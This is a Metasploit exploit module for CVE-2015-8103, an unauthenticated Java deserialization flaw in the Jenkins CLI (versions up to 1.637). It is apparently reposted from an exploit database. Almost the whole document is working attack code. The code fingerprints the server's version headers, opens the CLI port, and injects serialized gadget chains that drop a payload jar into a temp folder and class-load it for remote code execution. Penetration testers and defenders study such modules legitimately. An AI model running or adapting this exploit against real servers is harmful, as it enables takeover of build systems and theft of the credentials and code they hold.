###########################

# Jenkins CLI RMI Java Deserialization Vulnerability

###########################

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins master, which allows remote arbitrary code execution. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Christopher Frohoff', # Vulnerability discovery
'Steve Breen', # Public Exploit
'Dev Mohanty', # Metasploit module
'Louis Sato', # Metasploit
'William Vu', # Metasploit
'juan vazquez', # Metasploit
'Wei Chen' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-8103'],
['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Jenkins 1.637', {} ]
],
'DisclosureDate' => 'Nov 18 2015',
'DefaultTarget' => 0))

register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
end

def exploit
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
invoke_remote_method(class_load_payload)
end


# This is from the HttpClient mixin. But since this module isn't actually exploiting
# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.

def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end

def normalize_uri(*strs)
new_str = strs * "/"

new_str = new_str.gsub!("//", "/") while new_str.index("//")

# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end

new_str
end

def check
result = Exploit::CheckCode::Safe

begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end

result
end

def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})

unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end

http_headers = res.headers

unless http_headers['X-Jenkins-CLI-Port']
vprint_error('The server does not have the CLI port that is needed for exploitation.')
return false
end

if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
return true
end

false
end

# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout']
else
actual_timeout = opts[:timeout] || timeout
end

begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, actual_timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end

def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})

print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))

vprint_status(socket.recv(1024))
vprint_status(socket.recv(1024))

encoded_payload0 = read_bin_file('serialized_payload_header')
encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
encoded_payload2 = read_bin_file('serialized_payload_footer')

encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
print_status "Sending payload length: #{encoded_payload.length}"
socket.put(encoded_payload)
ensure
disconnect(socket)
end

end

def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end

#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
#
def set_payload
stream = Rex::Java::Serialization::Model::Stream.new

handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
decoded = stream.decode(handle)
handle.close

inject_payload_into_stream(decoded).encode
end

#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
#
def class_load_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_class_loader_into_stream(decoded).encode
end

def inject_class_loader_into_stream(decoded)
file_name_utf8 = get_array_chain(decoded)
.values[2]
.class_data[0]
.values[1]
.values[0]
.values[0]
.class_data[3]
file_name_utf8.contents = get_random_file_name
file_name_utf8.length = file_name_utf8.contents.length
class_name_utf8 = get_array_chain(decoded)
.values[4]
.class_data[0]
.values[0]
class_name_utf8.contents = 'metasploit.Payload'
class_name_utf8.length = class_name_utf8.contents.length
decoded
end

def get_random_file_name
@random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
end

def inject_payload_into_stream(decoded)
byte_array = get_array_chain(decoded)
.values[2]
.class_data
.last
byte_array.values = payload.encoded.bytes
file_name_utf8 = decoded.references[44].class_data[0]
rnd_fname = get_random_file_name
register_file_for_cleanup(rnd_fname)
file_name_utf8.contents = rnd_fname
file_name_utf8.length = file_name_utf8.contents.length
decoded
end

def get_array_chain(decoded)
object = decoded.contents[0]
lazy_map = object.class_data[1].class_data[0]
chained_transformer = lazy_map.class_data[0]
chained_transformer.class_data[0]
end

def read_bin_file(bin_file_path)
data = ''

File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
data = f.read
end

data
end

end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-12-20]

###########################